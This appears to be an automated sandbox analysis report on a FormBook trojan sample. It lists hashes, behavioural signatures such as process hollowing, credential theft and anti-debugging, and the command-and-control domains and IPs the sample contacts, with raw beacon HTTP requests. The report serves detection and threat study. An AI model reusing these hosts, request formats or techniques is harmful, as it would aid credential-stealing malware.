Windows Analysis Report
SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
Analysis ID: 830750
MD5: c7714b273571ba64c0b77afca236ac6d
SHA1: c24d9460bee8a724abe8b0dcf3d74851dd5737ed
SHA256: e62c1e809c48e66104c34ae3e977b82fbea2e984dee708bda431b608c2774c28
Tags: exeFormbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe ReversingLabs: Detection: 42%
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Virustotal: Detection: 42% Perma Link
Yara detected FormBook
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.vfpbkeeo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.567150912.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352371790.00000000008C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352064891.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.352209935.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567279277.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.567056934.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.energyservicestation.com/u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.com Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/www.gritslab.com Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/www.white-hat.uk Avira URL Cloud: Label: malware
Source: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.com Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.energyservicestation.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.thewildphotographer.co.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/www.222ambking.org Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.gritslab.com/u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== Avira URL Cloud: Label: malware
Source: http://www.un-object.com/u2kb/www.un-object.com Avira URL Cloud: Label: malware
Source: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr Avira URL Cloud: Label: malware
Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com Avira URL Cloud: Label: malware
Source: http://www.fclaimrewardccpointq.shop Avira URL Cloud: Label: malware
Source: http://www.white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.avisrezervee.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/www.germanreps.com Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/www.younrock.com Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R Avira URL Cloud: Label: malware
Source: http://www.germanreps.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.222ambking.org/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyz Avira URL Cloud: Label: malware
Source: http://www.younrock.com/u2kb/ Avira URL Cloud: Label: malware
Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com Avira URL Cloud: Label: malware
Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe ReversingLabs: Detection: 38%
Machine Learning detection for sample
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.vfpbkeeo.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.vfpbkeeo.exe.2080000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: vfpbkeeo.exe, 00000001.00000003.309270547.000000001A050000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000001.00000003.309553217.0000000019EC0000.00000004.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: vfpbkeeo.exe, vfpbkeeo.exe, 00000003.00000003.314888267.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, vfpbkeeo.exe, 00000003.00000002.352445837.0000000000A9F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.351980250.00000000033CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.353912435.000000000356E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.000000000381F000.00000040.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.568214365.0000000003700000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: vfpbkeeo.exe, 00000003.00000002.353773506.0000000002670000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\vfpbkeeo.exe Code function: 1_2_004089B8 FindFirstFileExW, 1_2_004089B8

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 85.187.128.34 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 45.33.30.197 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.un-object.com
Source: C:\Windows\explorer.exe Domain query: www.energyservicestation.com
Source: C:\Windows\explorer.exe Network Connect: 78.141.192.145 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.white-hat.uk
Source: C:\Windows\explorer.exe Domain query: www.thewildphotographer.co.uk
Source: C:\Windows\explorer.exe Domain query: www.shapshit.xyz
Source: C:\Windows\explorer.exe Network Connect: 81.17.18.198 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 192.185.17.12 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.thedivinerudraksha.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.30.147 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bitservicesltd.com
Source: C:\Windows\explorer.exe Domain query: www.younrock.com
Source: C:\Windows\explorer.exe Domain query: www.gritslab.com
Source: C:\Windows\explorer.exe Network Connect: 161.97.163.8 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.222ambking.org
Source: C:\Windows\explorer.exe Domain query: www.fclaimrewardccpointq.shop
Source: C:\Windows\explorer.exe Network Connect: 94.176.104.86 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.145.228.111 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49696 -> 94.176.104.86:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49702 -> 91.195.240.94:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49706 -> 81.17.18.198:80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe DNS query: www.shapshit.xyz
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: A2HOSTINGUS A2HOSTINGUS
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1Host: www.white-hat.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.gritslab.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1Host: www.bitservicesltd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.222ambking.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1Host: www.energyservicestation.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1Host: www.younrock.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1Host: www.shapshit.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pi0eI0K5lBX7KNLg== HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pRDkJdNDOVoQCU+9NHQShuJ8RlIM2fjCZpxzdvjpnmqfDHzh6n+FGyromdVZx0/+Z3ctR0ZwX+ep4hJ0NBR+2QmcJmTx4hb/kQ== HTTP/1.1Host: www.un-object.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 85.187.128.34 85.187.128.34
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 35 5a 35 7a 4c 65 5a 50 61 4c 66 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR75Z5zLeZPaLfvbt5YRg).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 7e 45 72 71 76 43 53 5f 30 5a 37 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMI~ErqvCS_0Z7gPOgw6Q).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 50 46 49 30 53 72 65 66 77 55 32 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tPFI0SrefwU2dntdDjQ).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 67 69 47 48 57 42 58 35 6a 6a 42 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMgiGHWBX5jjBgRqvHVA).
Source: global traffic HTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 43 42 4b 47 56 48 4e 35 68 5a 33 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 